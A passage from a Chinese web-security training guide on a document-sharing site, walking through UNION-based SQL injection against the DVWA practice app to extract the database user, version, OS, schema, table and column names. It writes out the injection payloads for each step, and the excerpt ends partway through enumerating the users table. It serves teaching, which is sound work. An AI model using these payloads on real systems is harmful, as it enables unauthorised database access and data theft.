- 1、本文档共6页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
SQL注入的高级利用
【实训目的】
1、掌握MySQL元数据库information_schema的作用。
2、掌握UNION查询的应用要求。
3、能够利用SQL注入漏洞查询数据库的表名、字段名称与值。
【实训原理】
元数据是描述数据的数据,因此可利用元数据实现查询相关数据的目的,结
合union查询,利用SQL注入漏洞可查询数据库的表及字段值。
【实训步骤】
步骤一、分析SQL注入漏洞所在页面功能。
登录DVWA系统,选择左侧“DVWASecurity”中的low级别,再单击左侧
的“SQLInjection”。
步骤二、获取连接数据库账户信息、数据库名称、数据库版本信息。
利用union查询获取相关信息,union查询要求前后两个查询的列数要相同。
我们现在不关心union关键词前面查询语句查出的值,可以利用条件,如“and
1=2”让其不显示,在union关键词后面利用内置函数user(),及database(),version()
注入得出连接数据库用户以及数据库名称。
1.在UserID输入框中输入:1and1=2unionselectuser(),database()--显示
如下信息:
图3-6DVWA注入user()函数结果图
说明连接数据库的用户为root@localhost,数据库名称为dvwa
通过注入得到数据库名就成功了一半了。
2.利用version()函数,尝试得到版本信息,输入:
1and1=2unionselectversion(),database()--将得到如下信息:
图3-7DVWA注入version()函数结果图
可以查询到当前SQL版本是5.5.53。
3.利用concat_ws函数一次性查出所有信息。
在输入框中输入:
1and1=2unionselect1,concat_ws(0x2c,user(),database(),version())--
图3-8DVWA注入concat_ws()函数结果图
可以看到用户名、数据库及版本号。
步骤三、获得操作系统信息。
在UserID输入框中输入:
1and1=2unionselect1,@@global.version_compile_osfrommysql.user--
图3-9DVWA注入版本函数结果图
可见操作系统为win32版本。
步骤四、查询MySQL数据库中的各个数据库的信息。
在UserID输入框中输入:
1and1=2unionselect1,schema_namefrominformation_schema.schemata--
图3-10DVWA被暴库结果图
可以看到MySQL数据库中的各个数据库的信息。
步骤五、查询指定数据库中的表。
information_schema.tables表给出关于数据库中表的信息,在此查询DVWA
数据库中的表。在UserID输入框中输入:
1and1=2unionselect1,table_namefrominformation_schema.tableswhere
table_schema’DVWA’--,将显示如下信息:
图3-11猜测DVWA数据库中表的结果图
可见DVWA数据库中有guestbook、users两个表。
步骤六、查询指定表的所有字段。
在UserID输入框中输入:
1and1=2unionselect1,column_namefrominformation_schema.columnswhere
table_name=usersandtable_schema=dvwa--
图3-12猜测DVWA数据库中user表的字段
您可能关注的文档
- Web安全与防护 实训指南 9.1Typecho1.0反序列化漏洞利用与分析.pdf
- Web安全与防护 实训指南 8.1跨站请求伪造漏洞的利用与防范.pdf
- Web安全与防护 实训指南 7.1文件包含漏洞的利用与防范.pdf
- Web安全与防护 实训指南 6.1命令执行漏洞渗透测试与绕过.pdf
- Web安全与防护 实训指南 5.2.5 .htaccess文件攻击.pdf
- Web安全与防护 实训指南 5.2.4%00截断上传攻击.pdf
- Web安全与防护 实训指南 5.2.3MIME验证与绕过.pdf
- Web安全与防护 实训指南 5.2.2黑名单及白名单过滤扩展名机制与绕过.pdf
- Web安全与防护 实训指南 5.2.1客户端检测机制绕过.pdf
- Web安全与防护 实训指南 5.1利用中国菜刀连接WebShell.pdf
- 2025年保定理工学院单招职业技能测试题库附答案.docx
- 2025年江苏财会职业学院单招职业技能考试题库完美版.docx
- 2025年上海工程技术大学单招职业技能测试题库带答案.docx
- 2025年南昌影视传播职业学院单招职业技能考试题库审定版.docx
- 2025年南充科技职业学院单招职业倾向性测试题库及答案1套.docx
- 2025年江苏海事职业技术学院单招职业倾向性测试题库及答案1套.docx
- 2025年南京科技职业学院单招综合素质考试题库推荐.docx
- 2025年重庆传媒职业学院单招职业适应性测试题库及参考答案.docx
- 2025年广西城市职业大学单招职业适应性测试题库审定版.docx
- 2025年山东胜利职业学院单招职业适应性测试题库及答案1套.docx
文档评论(0)